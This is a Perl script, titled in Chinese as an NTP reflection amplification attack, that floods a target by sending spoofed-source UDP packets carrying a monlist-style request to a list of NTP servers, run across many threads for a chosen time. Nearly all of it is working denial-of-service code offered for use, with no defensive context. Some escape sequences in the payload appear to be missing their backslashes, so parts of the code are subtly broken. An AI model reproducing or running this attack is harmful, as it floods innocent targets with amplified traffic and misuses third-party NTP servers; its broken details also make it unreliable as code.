Perl实现的关于NTP反射型放大攻击

  1 use threads;
  2 
  3 
  4 use Socket;
  5 
  6 
  7 
  8 
  9 
 10 my $num_of_threads = $ARGV[5];
 11 
 12 
 13 my $target = $ARGV[0];
 14 
 15 
 16 my $udp_src_port = $ARGV[1];
 17 
 18 
 19 my $time = $ARGV[2];
 20 
 21 
 22 #Open Input List.
 23 
 24 
 25 my $openme = $ARGV[3];
 26 
 27 
 28 
 29 
 30 
 31 open my $handle, '<', $openme;
 32 
 33 
 34 chomp(my @servers = <$handle>);
 35 
 36 
 37 close $handle;
 38 
 39 
 40 
 41 
 42 
 43 my $ppr = $ARGV[4];
 44 
 45 
 46 my @threads = initThreads();
 47 
 48 
 49 print "I guess im attacking $target for $time seconds with $num_of_threads threads
";
 50 
 51 
 52 
 53 
 54 
 55 #Does the list exist?
 56 
 57 
 58 if (-e $openme) {
 59 
 60 
 61 print "Using $openme as list.
";
 62 
 63 
 64 }
 65 
 66 
 67 unless (-e $openme) {
 68 
 69 
 70 print "List does not exist.
";
 71 
 72 
 73 exit();
 74 
 75 
 76 }
 77 
 78 
 79 
 80 
 81 
 82 #Start Threading
 83 
 84 
 85 foreach(@threads){
 86 
 87 
 88 $_ = threads->create(&attackshit);
 89 
 90 
 91 }
 92 
 93 
 94 foreach(@threads){
 95 
 96 
 97 $_->join();
 98 
 99 
100 }
101 
102 
103 
104 
105 
106 sub initThreads{
107 
108 
109 my @initThreads;
110 
111 
112 for(my $i = 1;$i<=$num_of_threads;$i++){
113 
114 
115 push(@initThreads,$i);
116 
117 
118 }
119 
120 
121 return @initThreads;
122 
123 
124 }
125 
126 
127 
128 
129 
130 
131 
132 
133 #Start DDosing.
134 
135 
136 sub attackshit{
137 
138 
139 alarm("$time");
140 
141 
142 repeat: my $ip_dst = ( gethostbyname( $servers[ int( rand(@servers) ) ] ) )[4];
143 
144 
145 my $ip_src = ( gethostbyname($target) )[4];
146 
147 
148 socket( RAW, AF_INET, SOCK_RAW, 255 ) or die $!;
149 
150 
151 setsockopt( RAW, 0, 1, 1 );
152 
153 
154 main();
155 
156 
157 
158 
159 
160 sub main {
161 
162 
163 my $packet;
164 
165 
166 $packet = ip_header();
167 
168 
169 $packet .= udp_header();
170 
171 
172 $packet .= payload();
173 
174 
175 #send_packet($packet) && goto repeat;
176 
177 
178 #send_packet($packet)
179 
180 
181 for (1 .. $ppr) {
182 
183 
184 send_packet($packet) or last;
185 
186 
187 }
188 
189 
190 goto repeat;
191 
192 
193 }
194 
195 
196 
197 
198 
199 sub ip_header {
200 
201 
202 my $ip_ver = 4;
203 
204 
205 my $ip_header_len = 5;
206 
207 
208 my $ip_tos = 0;
209 
210 
211 my $ip_total_len = $ip_header_len + 20;
212 
213 
214 my $ip_frag_id = 0;
215 
216 
217 my $ip_frag_flag = "010";#"x30x31x30";
218 
219 
220 my $ip_frag_offset = "0000000000000";#"x30x30x30x30x30x30x30x30x30x30x30x30x30";
221 
222 
223 my $ip_ttl = 255;
224 
225 
226 my $ip_proto = 17;
227 
228 
229 my $ip_checksum = 0;
230 
231 
232 my $ip_header = pack( "H2 H2 n n B16 h2 c n a4 a4",#"x48x32x20x48x32x20x6Ex20x6Ex20x42x31x36x20x68x32x20x63x20x6Ex20x61x34x20x61x34",
233 
234 
235 $ip_ver.$ip_header_len,
236 
237 
238 $ip_tos,
239 
240 
241 $ip_total_len,
242 
243 
244 $ip_frag_id,
245 
246 
247 $ip_frag_flag.$ip_frag_offset,
248 
249 
250 $ip_ttl,
251 
252 
253 $ip_proto,
254 
255 
256 $ip_checksum,
257 
258 
259 $ip_src,
260 
261 
262 $ip_dst
263 
264 
265 );
266 
267 
268 return $ip_header;
269 
270 
271 }
272 
273 
274 
275 
276 
277 sub udp_header {
278 
279 
280 my $udp_dst_port = 123;
281 
282 
283 my $udp_len = 8 + length( payload() );
284 
285 
286 my $udp_checksum = 0;
287 
288 
289 my $udp_header = pack(
290 
291 
292 "n n n n",#"x6Ex20x6Ex20x6Ex20x6E",
293 
294 
295 $udp_src_port,
296 
297 
298 $udp_dst_port,
299 
300 
301 $udp_len,
302 
303 
304 $udp_checksum
305 
306 
307 );
308 
309 
310 return $udp_header;
311 
312 
313 }
314 
315 
316 
317 
318 
319 sub payload {
320 
321 
322 my $data = "x17x00x03x2a" . "x00" x 4;
323 
324 
325 my $payload = pack( "a".length($data), $data );
326 
327 
328 return $payload;
329 
330 
331 }
332 
333 
334 
335 
336 
337 sub send_packet {
338 
339 
340 send( RAW, $_[0], 0, pack( "Sna4x8", AF_INET, 60, $ip_dst ) );
341 
342 
343 }
344 
345 
346 
347 
348 
349 }